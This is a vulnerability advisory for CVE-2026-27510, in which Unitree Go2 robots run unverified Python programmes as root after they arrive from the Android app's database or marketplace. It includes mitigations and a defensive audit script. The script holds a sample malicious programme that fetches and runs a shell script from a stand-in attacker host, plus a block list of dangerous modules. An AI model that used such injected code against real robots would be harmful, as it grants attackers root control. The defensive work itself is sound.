
CVE-2026-27510: CWE-345 Insufficient Verification of Data Authenticity in UnitreeRobotics Unitree Go2

Severity: Medium
Tags: Vulnerability, CVE-2026-27510, CWE-345
Published: Thu Feb 26 2026 (02/26/2026, 18:56:56 UTC)
Source: CVE Database V5
Vendor/Project: UnitreeRobotics
Product: Unitree Go2

Description

Unitree Go2 firmware versions 1.1.7 through 1.1.11, when used with the Unitree Go2 Android application (com.unitree.doggo2), are vulnerable to remote code execution due to missing integrity protection and validation of user-created programmes. The Android application stores programs in a local SQLite database (unitree_go2.db, table dog_programme) and transmits the programme_text content, including the pyCode field, to the robot. The robot's actuator_manager.py executes the supplied Python as root without integrity verification or content validation. An attacker with local access to the Android device can tamper with the stored programme record to inject arbitrary Python that executes when the user triggers the program via a controller keybinding, and the malicious binding persists across reboots. Additionally, a malicious program shared through the application's community marketplace can result in arbitrary code execution on any robot that imports and runs it.

AI-Powered Analysis

Last updated: 02/26/2026, 21:48:51 UTC

Technical Analysis

CVE-2026-27510 affects UnitreeRobotics' Unitree Go2 robots running firmware versions 1.1.7 through 1.1.11 when paired with the Unitree Go2 Android application (com.unitree.doggo2). The root cause is insufficient verification of data authenticity (CWE-345) in the handling of user-created programmes. The Android app stores each programme in a local SQLite database (unitree_go2.db, table dog_programme) and sends the programme_text content, including its pyCode field, to the robot. On the robot, actuator_manager.py executes that Python as root with neither integrity verification nor content validation. The robot therefore trusts whatever the phone sends, and the phone's database is the only record of what the user actually wrote.

Two attack paths follow from this trust gap. First, an attacker with local access to the Android device can edit the stored dog_programme record and replace pyCode with arbitrary Python; it runs as root on the robot the next time the user triggers that programme through its controller keybinding. Because the tampered record lives in the app's database, the binding survives reboots and fires again on every use. Second, the app's community marketplace lets users share programmes, so a malicious programme published there executes arbitrary code as root on every robot that imports and runs it, with no signing or review gate in between.

Exploitation needs no privileges or authentication on the target, but it does require the user to trigger the programme. The CVSS 4.0 vector is AV:N/AC:L/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H, scoring 6.4 (medium). Note how the impact is split: the vulnerable system in the vector is the Android app, which itself suffers no confidentiality, integrity or availability loss (VC:N/VI:N/VA:N), while the robot is the subsequent system and takes the full hit (SC:H/SI:H/SA:H). No patches or known exploits are currently available. In practice this is root-level remote code execution on the robot, compromising both its control functions and the underlying operating system.

Potential Impact

The vulnerability yields arbitrary Python execution as root on a Unitree Go2, which is enough to take full control of the robot: reading or exfiltrating data from it, manipulating actuators, disrupting operations, or using it as a foothold on the network it is attached to. The attacker's prerequisites are modest rather than zero: either write access to the paired Android device's app data, or the ability to get a shared programme imported and run. Once a record is tampered, the malicious binding persists across reboots and re-executes every time the user triggers it, so a single tampering event becomes long-term compromise. Organizations deploying these robots in sensitive settings, such as research labs, industrial automation or security patrols, face operational disruption, data leakage and physical safety hazards. The community marketplace turns this into a supply-chain style problem, since one malicious programme can reach every robot whose operator imports it. The medium CVSS score reflects the required user interaction and the indirect path through the phone, not the consequences on the robot, which are severe.

Mitigation Recommendations

Until the vendor ships firmware and app updates that verify programme integrity and validate content before execution, the controls available to an operator are mostly around the phone, the marketplace and the network:

1) Restrict physical and local access to the Android devices that control Go2 robots to trusted personnel, and enforce device-level authentication and storage encryption so that the app's database cannot be edited by someone who picks up the phone.
2) Treat the community marketplace as untrusted. A shared programme's pyCode runs as root on every robot that imports it, so do not import programmes unless their code has been reviewed, and prefer authoring programmes locally.
3) Integrity checks are a vendor change; operators cannot add signature verification to the app or to actuator_manager.py themselves. As an interim control, keep an out-of-band record (for example a hash) of each approved programme's programme_text and compare it against the stored record before use.
4) Audit the dog_programme table in unitree_go2.db for unauthorized changes. Note that the database sits in the app's private storage, so reading it requires a rooted device, an ADB backup or a managed-device agent; plan that access before an incident rather than during one.
5) Educate users not to run programmes they did not write or review, and to report robots that behave unexpectedly after a programme is triggered.
6) Segregate robot control networks from the general enterprise network so that a compromised robot has limited reach, and so that a phone-to-robot session cannot be reached from arbitrary hosts.
7) Engage with UnitreeRobotics for firmware and app updates that address this issue, and apply them as soon as they are available.
8) Consider endpoint protection or mobile device management on the Android devices to detect tampering or malware on the phone itself, since the phone is where the integrity of the programme record is actually lost.
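The data flow described in the analysis (SQLite record on the phone, programme_text with a pyCode field, executed unverified on the robot) and mitigations 3 and 4 above both come down to the same two checks the robot never performs: is this record the one a trusted party approved, and does its code do anything a motion programme has no business doing? The script below is an added example, not Unitree's code, that models both gates over a constructed in-memory copy of the dog_programme table. It assumes programme_text is a JSON document with a pyCode field, and it adds a hypothetical sig column carrying an HMAC-SHA256 tag; the real schema has no such column, which is the bug. The HMAC key is assumed to be held by the robot and a trusted signer only, never by the phone. If the key lived on the phone, an attacker who can edit the database could simply re-sign, so in a real fix the signer would use a public-key signature (Ed25519 or similar) and the robot would hold only the public key; HMAC is used here because it is in the standard library. The three rows show a legitimate programme, a record tampered on the phone (body swapped, old tag left behind), and a marketplace programme that a careless signer blessed even though its code shells out, which is why the content check is a second, independent gate.

```python
"""Gate Go2-style programme records on integrity and content before execution.

Added example, not Unitree code. Assumptions (labelled): programme_text is JSON
with a pyCode field; a hypothetical 'sig' column holds an HMAC-SHA256 tag from
a signer whose key the phone never has; the robot checks both before exec.
"""
import ast
import hashlib
import hmac
import json
import sqlite3

# Hypothetical signing key: held by the robot and the trusted signer only.
ROBOT_KEY = b"example-key-never-stored-on-the-phone"

# Modules and builtins a motion programme has no legitimate reason to touch.
DANGEROUS_MODULES = {"os", "subprocess", "socket", "ctypes", "importlib", "shutil"}
DANGEROUS_CALLS = {"exec", "eval", "open", "__import__", "compile"}

# Constructed sample programmes (not real Go2 API calls).
BENIGN = {"name": "wave", "pyCode": "robot.set_joint('FL_hip', 0.3)\nrobot.sleep(1)"}
MALICIOUS = {"name": "wave",
             "pyCode": "import os\nos.system('curl http://attacker.example/p.sh | sh')"}


def tag_programme(programme_text: str, key: bytes = ROBOT_KEY) -> str:
    """Tag the exact stored string; any byte change invalidates the tag."""
    return hmac.new(key, programme_text.encode(), hashlib.sha256).hexdigest()


def make_db(rows):
    """In-memory stand-in for unitree_go2.db with a dog_programme table.
    The 'sig' column is the assumed addition; the real table lacks it."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dog_programme "
               "(id INTEGER PRIMARY KEY, programme_text TEXT, sig TEXT)")
    db.executemany("INSERT INTO dog_programme (programme_text, sig) VALUES (?, ?)", rows)
    return db


def static_findings(py_code: str) -> list:
    """Walk the AST of pyCode and report imports/calls outside a motion programme's remit."""
    try:
        tree = ast.parse(py_code)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in DANGEROUS_MODULES:
                    findings.append(f"import {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in DANGEROUS_MODULES:
                findings.append(f"from {node.module} import ...")
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in DANGEROUS_CALLS:
                findings.append(f"call {func.id}()")
            elif (isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name)
                  and func.value.id in DANGEROUS_MODULES):
                findings.append(f"call {func.value.id}.{func.attr}()")
    return findings


def audit(db) -> list:
    """Decide per record whether the robot should execute it: tag must verify
    over the stored bytes AND the code must pass the static check."""
    results = []
    query = "SELECT id, programme_text, sig FROM dog_programme ORDER BY id"
    for row_id, programme_text, sig in db.execute(query):
        sig_ok = sig is not None and hmac.compare_digest(sig, tag_programme(programme_text))
        py_code = json.loads(programme_text).get("pyCode", "")
        findings = static_findings(py_code)
        results.append({"id": row_id, "sig_ok": sig_ok, "findings": findings,
                        "allow": sig_ok and not findings})
    return results


benign_text = json.dumps(BENIGN)
malicious_text = json.dumps(MALICIOUS)

# Constructed rows: legitimate; tampered on the phone (old tag left behind);
# marketplace programme the signer blessed despite its contents.
SAMPLE_ROWS = [
    (benign_text, tag_programme(benign_text)),
    (malicious_text, tag_programme(benign_text)),
    (malicious_text, tag_programme(malicious_text)),
]

if __name__ == "__main__":
    for result in audit(make_db(SAMPLE_ROWS)):
        verdict = "EXECUTE" if result["allow"] else "REJECT"
        print(f"record {result['id']}: {verdict} sig_ok={result['sig_ok']} "
              f"findings={result['findings']}")
```

Record 1 is the only one that would reach the executor; record 2 fails the tag because the phone-side edit changed the bytes without the key, and record 3 passes the tag but is rejected by the content check. The static scan is an allowlist-style filter, not a sandbox: in a real fix it would sit alongside running programmes under an unprivileged account rather than as root, since a determined author can still find constructs the scan does not name.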


Technical Details

Data Version: 5.2
Assigner Short Name: VulnCheck
Date Reserved: 2026-02-19T19:51:07.327Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 69a0a43885912abc71d61abb

Added to database: 2/26/2026, 7:51:20 PM

Last enriched: 2/26/2026, 9:48:51 PM

Last updated: 2/27/2026, 2:24:49 AM

Views: 5
